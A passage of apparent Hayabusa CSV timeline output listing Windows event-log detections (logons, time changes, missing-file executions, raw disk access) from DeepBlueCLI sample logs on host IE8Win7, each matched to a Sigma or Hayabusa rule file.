.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x298c5 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x29908 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:24:53.630 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate 
Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d5b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d8d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f43 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:49:28.191 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : 
Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a20 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a67 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24902 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24936 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19489 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - 
